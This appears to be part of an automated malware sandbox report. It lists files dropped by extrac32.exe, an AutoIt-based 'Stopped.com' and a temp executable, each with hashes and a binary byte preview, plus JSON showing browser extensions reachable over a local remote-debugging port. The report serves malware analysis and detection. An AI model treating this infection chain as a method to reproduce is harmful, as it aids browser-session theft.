                                                                                                                                                                                                                                                                                          Preview:..Xs....3}.3.S='.:.N..`...J.....I....8.>I.a......+.. J?......'-U.(.H._X\...n.i.....QvU.j.;q....C..;. ../.V.).....d.4+.\O..0.K.*.... ...r*vF;....O...........i.V........J...M...M..5.!T.~.I2...9v.....W.@.8P.......0nE.i[..Cy..s...X.......7....=....vs>y\.,......B.%./..p....E.E.....E..m.....z......!....8(..p....Z=.n....d..P....V.(.f$nMP..C..@.*..R.V&X~N.....F04b)...3..]....P..|s...:B.z...c.......G.......t....`.Q.:...sNuY...4...s+.1...+...C....?F..b)...-..X+..Bl..r.k!...[7.................\o.... ..H.7/.~..@7[..w....>....;.2.\..B....%....H..&'......#..Ol.23........!.Nl..Qt..%.`.K......Cf.....3....S.G.jd*...2...l6..:...C<B"$7...M.d+....<...C.8..=c...YX.......k....i..sV.P.U....qe.&x.?%.T'.,4....f..:6.........Q....0..Q..R A.-...5"......m.l"G...................).M.U.i8......2^.....`...C.VP..G.../A.g..Q>..U..}.....f../...]Y.@h.{Y}.!l....(..A.w.F..]....:...?m.5..J.;?O..o.W.`.aZ.>.:CsD*T~.........hl..S@J.....(...Ae.....0..if.Oz..g....TK.F..IA.....

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3581
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3903161571325295
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:6NnCKHCiNnCYbCNNnCk9CcXNnCxdgECCNnCYCb8NnCBRDCYNnC4wC5NnCB3Cd:6NBNQN1N6tNDN+tNJzN3
                                                                                                                                                                                                                                                                                          MD5:740B6E85CB148B891384386F372F9C79
                                                                                                                                                                                                                                                                                          SHA1:5D521A87F5434498B0D855F71D56025FDF919A1B
                                                                                                                                                                                                                                                                                          SHA-256:4AFFBD9E3DADA7A451AD16DF14201498FBA4CEB18BD83F5681D9C6A71A3FF642
                                                                                                                                                                                                                                                                                          SHA-512:64B67459D39EE7B2DB8E86ECD9D2B46C7D703B466410B683CF5AFB6BD9551EFCBA0858316C2E4C2318217C5AEEA81C7CB09DFA9A60DFBD7463DE5FFFFCFBF550
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/427EDAA0AC347EE485DD2C78BBBD21E0",.. "id": "427EDAA0AC347EE485DD2C78BBBD21E0",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/427EDAA0AC347EE485DD2C78BBBD21E0"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/BD148C085C664882B3C91AAAF0FA29D9",.. "id": "BD148C085C664882B3C91AAAF0FA29D9",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/BD148C085C664882B3C91AAAF0FA29D9"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1787
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.37692243300088
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:SfNaoCNTEC+fNaoCcCDfNaoC5pNpFC5piYfNaoCRpZ0UrU0U8CZ:6NnCNTECmNnCcC7NnCJC6kNnCZ0UrU0s
                                                                                                                                                                                                                                                                                          MD5:324DCCA4F13574E9A3475A4AC2D4D78E
                                                                                                                                                                                                                                                                                          SHA1:4F9C990B22D04C62A36DB0AD013D3246A491178A
                                                                                                                                                                                                                                                                                          SHA-256:A53DA949BFEF6552624D10CC953C0A6801B874C9364DE9EDE67D47DF87CA675E
                                                                                                                                                                                                                                                                                          SHA-512:A854A1A2C97259F5231439B31449E8FFD88825E5FE22C5BB638935330EFB9BDC079A5C1148C3A525CAFB0B6B1CA741241815AD72BA9E63A252818F32588D28AA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/2B965D4E5F7CD7626A2EC0F4858E17DA",.. "id": "2B965D4E5F7CD7626A2EC0F4858E17DA",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/2B965D4E5F7CD7626A2EC0F4858E17DA"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/AB3D7566C8076107CFA88FC0DB45ACA9",.. "id": "AB3D7566C8076107CFA88FC0DB45ACA9",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/AB3D7566C8076107CFA88FC0DB45ACA9"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Increasingly

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):141312
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.191432447608067
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:AzW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtsa:AzWWt/Dd314V14ZgP0JaAOz04phdya
                                                                                                                                                                                                                                                                                          MD5:0A145CC0A96E5CA92E4EF959E5DE2BC8
                                                                                                                                                                                                                                                                                          SHA1:86C70E9A7307AB27F5BA2AAD61351BD36B25B10E
                                                                                                                                                                                                                                                                                          SHA-256:F1044DA89B01FE779139B3AB70CB601080E5A5BE06D5B46B0650B5C68548813D
                                                                                                                                                                                                                                                                                          SHA-512:43484843602F6AFAC95BF2759C57D7821B0FEB404E1B50279D89EAF826C6A779B5B1A6CAE865C7379C1CBF5D765A4840162F2C7D0D8A8C2C72A133E6DE4BEC1F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.......`.L..L$ .......t8.G..p....nw...L$..D$0P.v..(....M..D$..D$0P.c...D$...... .L..L$ .......t..G..p....$w...v..L$.......I....P9L..L$ ......t..G..p.....v...v..L$.......:.@.L..L$ .j.....t..G..p.....v..S.|....u........F.........t$...u)...H..D1.8\1.t..@8.@......D1.8\1.t..@8.X..L$@.R....L$ .A....L$0.8..._^3.[..]...U..U.V........J.....,....teR.......j....7......By*...Q..|2...L2.t..I8..A..|2...D2.t..@8.@...u.........&..F.....................3.^]...U......DS.].V...D$...I.3.C.AW.D$.3..L$<...L$,.L$0h.L..D$4.D$<.D$..D$..D$ .D$$.D$,.R...M.h..I..R..h..I..L$$.R...C..L$..0.`...|$...L$.r..C..p....D$ P.l`...D$0P.L$..^`...D$...P.k.....u....H..|1...D1.t..@8.@......|1...D1.t..@8.@...w.|$..u..C..H.....x..L$@.u..........D$@PW.I.....t..M..D$@P..`...,...H..|1...D1.t..@8.@......|1...D1.t..@8.@...L$@.A....L$ .@....L$..D$...I...^...t$......Y.L$0....._^3.[..]...U.........S.].3.VW...D$(.s..t$ .D$,.D$$.D$..D$0.D$....r'.C.j).H..L$H......u...s...L$D.A....D$(...r..C.j).H......u.....D$,...rV.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Mph

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):87040
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.579684886442836
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:Un+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bN:U+AqVnBypIbv18mLthfhnueoMmOqDoiR
                                                                                                                                                                                                                                                                                          MD5:D68F4D9FDC2A39C154E763318E13AD79
                                                                                                                                                                                                                                                                                          SHA1:6534EF7A8A74C7A4E3487D304A88E8511A518CE7
                                                                                                                                                                                                                                                                                          SHA-256:0BA592D7FD02B59D73D971C63EF320D4F94A349AF352EEBE792698258B9FFFA2
                                                                                                                                                                                                                                                                                          SHA-512:C07C27ED4622B7AB1D117C0A36C72170C820C04E12A8D5CF4A1AE21ADFEB73AABCBDE3B680178E6797533485253F290613CFBBC6D30D3EDA5E5CB9B118810156
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:....uU.L$..d#...t$$.|$..B.L$..Q#...E....L$..C#...E..t$$.D$....5.)M..L$..'#...t$.3..D$$....F.D$.P.L$,.j....L$....0)M.A.L$.;...p....|$.Q.D$..\$.PQS.D$H.0$M.P.D$<Ph )M..e*....t.95,%M.t..=,%M.8\$.t<.L$8......L$(.D$(..I..)....t$,.p=..Y.L$.."...L$8.y"...../.L$(.D$(..I.......t$,.?=..Y.L$..Q"...L$8.H"..3._^[..]...U......<SV3.W.=,%M.F.|$.;........=g#M.........u.3.0$M...,%M.......L$..y....~....\$8.\$@.t$D.\$..\$ .t$$.D$(..I..\$,.\$0.\$49Y.~y....+.t=...t&...t....uF.L$..!...E..,.L$..!...E....L$..}!...E..t$$...L$..k!...E..D$$.....D$..D$.P.L$,....D$.G;x.|..|$.Q.D$..\$.PQS.D$H.0$M.P.D$<P.u..(....t795,%M.t/.|$D..=,%M.uU.L$8......D$@h.~L..0....YY..u6j.[..L$(.D$(..I..c....t$,.;..Y.L$.. ...L$8. .....E8\$.t..L$8.....M....L$(.D$(..I.......t$,.c;..Y.L$..u ...L$8.l ..3._^[..]...U..S.].V..W....K..C..F...tP...s.j.X3.F.j.Z.........Q..;..3..F.Y9~.v.j...:..Y.K.........J..H..N....G;~.r...3..~..~._..^[]...U..V.u.W.......OD.F..G..F..G..F..G..F..G..F..G..F..G..F..G..F .G .F$.G$.F(.G(.F,.G,...F0.G

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Nj

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.996556964697908
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:V6+L9+YJmYhfbh9amXsJfChmKmtrlu70t37:VvQqDxs4hrmxA7kL
                                                                                                                                                                                                                                                                                          MD5:186B65432BA1E669E027335DAE6BAB2A
                                                                                                                                                                                                                                                                                          SHA1:A0A328312E0233BBC7EFE4EBF7EAE92C92DAC46B
                                                                                                                                                                                                                                                                                          SHA-256:90C1770F14679AA9A49F8AC342464AA9869B6C98579CA4E14660AD5C405571E3
                                                                                                                                                                                                                                                                                          SHA-512:D102AD48650B9C1781420DD6631457F2C7D0ABAF646282E84D88DF3860D29F456789ACC2103EEAE105177F9AABAA162E06B655865456F2B7550DB7C033A419A4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..._'.nQ..;x4.i.=.M...Ye..Hl...../o.\...E'....$]...K..d.#...`........-...B.s_.h.....Sm9.frv.......M5...&..cIE..o..L...}.l..4...^..y.L.N...4J\.`.!...y.H.Y~..IG3I_.Z..e.CV.."....;b....5.._..iV"W,../e.... .(t.~.,Y7..d..r6v@.#.,..:.d......ZQ..........6}...O`..}..f.B..A....x=..6.'.Se.xzD./.g.S.`.6.:...a.Z.........A0..#.zZ...1x...'..pO....s.A..H...W$...(.F.}.Fj.l....6x....$ .....`.n.....AV.7.O<.r....N....f..o`5.).nP3...D..!...''..a..........+m.\c.!s0..u8-X[rK*5.E.a.S.2..jw..xI>...A+Y+7@..<j...`..7Ig..6@z..yH1a.C/...l|S.....-...Z..c..h....AF...'.=.dIPtK[.ua....}..Q..\s..Q.T*.........`..":%[.o$!G...C(A...a?.......o..?.;.o...nA....m.S...{M.Pg.?k..UV].N.r..0..Tw......z..<C.s.......%.w.......i......#..EA...-.BF..H....C0.......}.6'.w-..O..!.c1q...?.0_ .....>r..#.)..z.Vx.a..7...R..r.^...p..\......Zj...Jz.J#.N.\.c.G.$<...l.d.,.];.M...S..[.W../5a.6K.E.D....8bd...^.F......$.G.w...80.h...=.^..G.....jR.S....^.:...,:....C.b&.....+.....q)D.R......6.m.+0.co...+.R...u

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Passenger

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):7467
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.605921032882955
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:/H6N8VEVFJ84kcGNq4/C+Q3ISVSWMZMQ3rw:/rVEVFJ8ZcGwGBk7/UMQ3rw
                                                                                                                                                                                                                                                                                          MD5:A5C6DD2B4965F95822D71AB50D56C1C8
                                                                                                                                                                                                                                                                                          SHA1:0B3B429D4FC992A55B0B77AA05499E80FD550FC8
                                                                                                                                                                                                                                                                                          SHA-256:E4727DFC91D01D58DD6D7242A3BC6440E8F3A1606101D85B78DB3B316FF91BF2
                                                                                                                                                                                                                                                                                          SHA-512:FA3FA852049B240E866D695D2502A3C7AE44BBE0D8C3D3C648EC8FF5523CA274F8DA64C62E139F29B3B203633BCB475A671280CFC46FA3630605EF0B51DF9FF9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.9...t.Qg..Y.....[A.......|k..H;.^q..w.WP......2lnF.;....}.......X....&-`.d...H*}.)..f..+....";Y.}..#....). .%|.X.[.....tgo..!sN....9v.\...|.)F.....1.I4V(F.......x.t.2.............T.Ia.S..&zp2....5..U..ye.{.$.;..!.f...E...1..70..3...0j0Z1.0...U....BE1.0...U....GlobalSign nv-sa100...U...'GlobalSign CodeSigning CA - SHA256 - G3..8.Hn...04.J0...`.H.e.........0...*.H......1...+.....7...0...+.....7...1.0...+.....7...0/..*.H......1". .g.6..l....#..t.X..n|$>.......0^..+.....7...1P0N.". .A.u.t.o.I.t. .v.3. .S.c.r.i.p.t.(.&https://www.autoitscript.com/autoit3/ 0...*.H............>./.f..m..6.5.f..V..6.......E.]....Q...).S.......A20......|.aH|A..B;.L:..,...<.d>m._.Ij..Fx...2........~,.P.......u.um..S..7c.]..\f....e{W.XM&..*.b.=4..)....C.O).@.....&OX.29\.K.bG..;c-f..:.. .K..u.....O.riW....u5.GU[..zoH.e..i.....0RZ....5....0.....+.....7...1...0.....*.H..........0......1.0...`.H.e....0....*.H..............0.......+.....2..010...`.H.e....... .s....Y....8.z..^.....&..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Pour

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):59392
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.996930624097006
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:jZ5wVuN14R4mgnrRkUqr39udAc10UacQ39jWRL/7Xo4vMzN3Nyi7yKVLIHsb4:j1Y0rRir39GAceUQ9Ka4vMxNT7yW0K4
                                                                                                                                                                                                                                                                                          MD5:65CE095A10F89F4F63D02AA05B99379B
                                                                                                                                                                                                                                                                                          SHA1:781A9C3E1105DFB9027A375D5A96092A8B6AFBC8
                                                                                                                                                                                                                                                                                          SHA-256:0A696FF4BED86CE74790651A900A29B565B73CFBB359498E6EDCB157EB435C78
                                                                                                                                                                                                                                                                                          SHA-512:981B42C10F7A055B8D54007811662AE1408FF7C09748DDB353FE7F075F4EDC54E48917F7669680BFD46DC2876B1A18C5CDEA1DF2C5D642620BDA3599E3A61A6D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..a..c...{n%)B...Cb.L}{.{0>.../...<.h.y.{.......r-t.v..c.#1........>*0gz,.......=.....jz....'......k..."C$.p_.n...(.......Z..(.O....X..^..QmQ].<.4..q...a..5}.JlO.........|?E< -...sZ.....?..w.e."T.wE....Xt.|23c..7....f...GX...N........E...F/h..s..:....N0.9..o.<>..y...C......fs..0u..:.......O......e.Q...;._..b.q..1^..9...1.}...}...K.3..9..SZ.."\...P....5q...!....az..2.4..Y.^.6..O..r.......B.........H#........et.w..c..A;.?|....="......e.}.....zQ.n.?..u....z...h.~!..=..0...........~.....@........<V...1..P...z<.......%.,Z.........Y..].....^.[.;-.eh....6.........5.uP...=`.c"qd8.R..A...2.......... ..p.%.[t..pV......%..C.=..m."....h.u=o......>#../.t:..Pc.i..R......g.@.."...%.Q. %..d=$j.4..H.)...;u..9r.E....%.{.C....{...t(...;`x&C..U>...en.i..Nj..D.F*NN.r...iA.....$...k.\mW.....8..S..."q..O7&&..O$..N.1,....B..LQ..w+..u.Hl3..v.H.e{x....U.P.G...a.I,7.....]..i..uS*md... ...a.6.....V...?9b.4]$..s&U..t...[...ly$....H...t.WBJ....bi..$..s5.(...:.L

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Refugees

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):78848
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.656810356811789
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:Ku2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+IU:ccBiqXvpgF4qv+32eOyKODOSpQSq
                                                                                                                                                                                                                                                                                          MD5:400217C87A4BDF536EF5173EBC5B8927
                                                                                                                                                                                                                                                                                          SHA1:4014B78EB595CC739F5E5915D909CC85AC83B2CE
                                                                                                                                                                                                                                                                                          SHA-256:C4EC199F43F733B29203D0F3FE504E4E2AD59580427962D60C27131A3EA9D815
                                                                                                                                                                                                                                                                                          SHA-512:689FCF84FAAD7817E46A55D9B6243110D674E75CD5EC7EA5888663EBB2B96E943FC3E6CD895451448A552B38217EFE38C3C57A572304A09F90E782D5B5DD5177
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.U..3..}.csm....].j.h.L.......u...u..B.....t..u..z...Yj..f...Y.e...=`.M........3.@.X.M....E......}...u<....L.....j Y+.3...3..\.M.;.t.3.3.PPP.........I...h..M......u.h..M..8...Y.e....u.h..I.h..I.....YYh..I.h..I.....YY..u...`.M...E......'.....u,.u..*....E...0.........e......u.j......Y..R.....U.........t d.0....@h.....u..u...\.I.P....I..u..O...Y.u.....I..j.....I....u.2..MZ..f9.u.A<...8PE..u.....f9H.u.xt.v............U..QQ...L.3.E..e...E.Ph..J.j.....I...t#Vh..J..u.....I.....t..u.......I...^.}..t..u.....I..M.3......]..U..E..\.M.].j.j.j..........j.j.j...........U..j.j..u........]..U....L....j Y+.3...3...L.9.\.M...E....u..S...Y.\.M.]..U..j.j..u..l......]..U..A...+...V3....;.....#.t..U.F...I.;.u.^].....U...u..d.M.....]..U..Q...L.3.E.V.........t..u.......I...Y..t.3.@..3..M.3.^.....].j.h..L..3....e..j..Y...Y.e...5..L.....35d.M...u..E.............@....u.j..h...Y.j.h .L......e..j......Y.e...5..L.....35d.M...u..u.. ...Y.d.M..E.................u.j......Y.h

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Relative

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):88064
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998091767930921
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:MAbgO1x1yTQidbqonV0y5YkjeOyCFquK//N+ouxnx67/oZS116dS1qH01D4/:MI1BiLz5fe0Fs/uJxe/ocCdIqH01s/
                                                                                                                                                                                                                                                                                          MD5:F03D187A839A718B9A0F351C2A16AF30
                                                                                                                                                                                                                                                                                          SHA1:DB3AA26DE737192269A19160BCC6712000104C93
                                                                                                                                                                                                                                                                                          SHA-256:D9E0E85DAB575AFC1C9E886F0117874D1CDBD83A1BE319E905B62C2015524701
                                                                                                                                                                                                                                                                                          SHA-512:2A4CA34D7D7220E4222BA1BE8918709C9B297D7623B74896C0AD744C008B9CE1A1BEF63CFCD3BA6AB18DA236FA3DC34C4A718610D7ADF20821BC7BD2A7EBA7E6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:0...@r.[.....Z..<..^ F.Oecc.....P........I......{........:Y..uz[..v2..O...'....uP.P..+........UJc.D.....<...Z:....#.......<~q.&..i...+.N..E..V.h..T./....u..T...u!.t.....R.6Rp..`O.......u.......\q....(S...X.._#B.-...[e.d....AL\..bo...!..F:(m..'..V[..EW....>sX...O:s..P.f..&..x.8l."M..0.....ct.}..F...o.h...{a..r....@..p9.....S..[....P........_o.5..m..M.=.OY{..rT......0..c.L#........ ...y..k...."..;.L..=..a4h7.l........4...~..0..0.TT^.....XRH.a..@i.GQ.e/....2...l....m.k....Z{c<..j.].8s..=P....7.i?...j=.".m.7..TH...b.......l..........9.T..$p"I1.X...S.).w}..% .C..........$b..N....`.A~.[..+uL..~..F.'?yN..T..)....5.cK._d.o.n..s.q...4r.......zi......(..g.L...L..._O,.C....9.<.IpF.~.....3.Y....jT.n...^W.x..6I%Qg..4.n.P.?.....<...... ..RW...X.~..%S.eQ..k.'&.&O..>.../f<.J{q..n..$...$Ot........7}j.p.,&.z.i...|b5...?......v..S.n+_.A.Ap....@...&....F.N.....M..;..[V.p2.6.H.lO.#-.j.h......$..v}l....H.f.Z.H..Y../..cQ.$....2.....B.t.Ktv.)....nG...Y......g.._.[..1C.PO

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Removal

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):87040
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.695029179104762
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:WdTmHwANUQlHS3cctlxWboHdMJ3RraSXL21rKoUn9r5C03Eq30BcrTrhCXQ:WdTmRxlHS3NxrHSBRtNPnj0nEoXQ
                                                                                                                                                                                                                                                                                          MD5:6707DFF65E17B5C01F303BDC514168A4
                                                                                                                                                                                                                                                                                          SHA1:AB642DF7A78AE1C4442F4417F7E85A50C88D4295
                                                                                                                                                                                                                                                                                          SHA-256:A5F8D17FEDD6D0B446F68F3C92BD4D103A116D107C68E33E0D13299C04875CC2
                                                                                                                                                                                                                                                                                          SHA-512:1CB6C0A4A08C11F11D3FFD2F9436AB516D81E7A9A22446A70695CDBCFC82B54E7D2CE6717E974725B26922AE0B3F35C8991DAC9AD23421C8A480816D1A5EC6AB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...U..U......:...t.......Q...g....U..M..E......U..e....$."2E....._...R..p.I.j..u..w....I....J......j..`....5......}...j..M.r.........j..u..>........Q...~....................j...................j..u..?...............C..F.............6...s......3.E..............Q.7.........E..t .M..t....QPV.........u..........u..V...f..0..t...j................J..H..J..H..J..H....a........G..F..T........K....3.......j..s..f.......X....}...U.........................C..E......]........E.P.E.PV.........K....V..M....f.x..uV.8.uQ.D..f.x..u$.M..U..m.....E......]..i...H.E..`.....H.......F........@.Pjr.X.........H.......F........@.Ph.....3.........M.j.jv."........h....E.P./...m.........@...Ph...............e.E...@...@...E...@.B.E...E...E...E...E...E../E...@...@.l/E...@../E../E../E../E../E../E.j.h......`#M.............6....w....t..@...j.@P.....v..k.....M...........,.................'...;.D)M.}3.@)M........t%.H...t...$....RQ.0....I.....w.........)M......c.........................5M.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Severe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):109568
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.672418356042835
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:HFrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3B0:HU4CE0Imbi80PtCZEMnVIPPBxT/sZr
                                                                                                                                                                                                                                                                                          MD5:ECFF310168B297B43DDDDB0A2F16B9C5
                                                                                                                                                                                                                                                                                          SHA1:C08340C4388C98A938910FC4E7367EB745E265F8
                                                                                                                                                                                                                                                                                          SHA-256:1F3A13E7801C043733D22EF115BAD8557B7DE5C2B3B7BCB96167F1D7CC266D57
                                                                                                                                                                                                                                                                                          SHA-512:B195F161688095BE706080295C52D0A4FD8F6899463BF6F421CDAD5C8216F3848585D6F1DEA691C4A1ABC5C0E2FF3E13360F3CD1E5289B9C28BACCA17C419F89
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......A.E...........p=J.......9M.u..}...........E.......A..s...........E.{b.....\9E.uY.}..uS.E.QQ..$.......E.YY.......Au.......p=J....u ...........z....u......=J.......E...3.].j.h.L....3..u..>j.....Y.}..E.P.s...Y......t..x..x..8.x..H...E................u.j.....Y..U..E.3...E..H..E..H..E..H...E..H..E..H..E..H..E......]..U..QS..l.M.VW.=p.M...........]..A.7..tS.F......u.V.I...Y.V... ............u..].......u.V.6...Y...;.u..E.. ._^[..].E..0..j8j......j..../..........t.H....j.h...... P.P....7.. ...F....V.....Y..U....3.S.].VW.}.u.j.Yj ..........M..u..C._....f9>t....3..at!..rt...w.................C..............K...U.2.U..U....m....f..........S.pt\+..........tB...t4...t'...t......u....m...u.....4............S......s...m.2..s.E.PS.}...Y.].m...u..;...U....T..Tt@...t3...t"...t..........S.z....&.E.PS......E.PS......S.......S.....U.Y..m.3.......4F...........m...t....f9>t...u.3.f9........C......j.hD?J.V.......................f9>t.f.>=ur...f9>t.j.hL?J.V.o........u...

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Trees

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11126
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.982118783650782
                                                                                                                                                                                                                                                                                          Encrypted:false
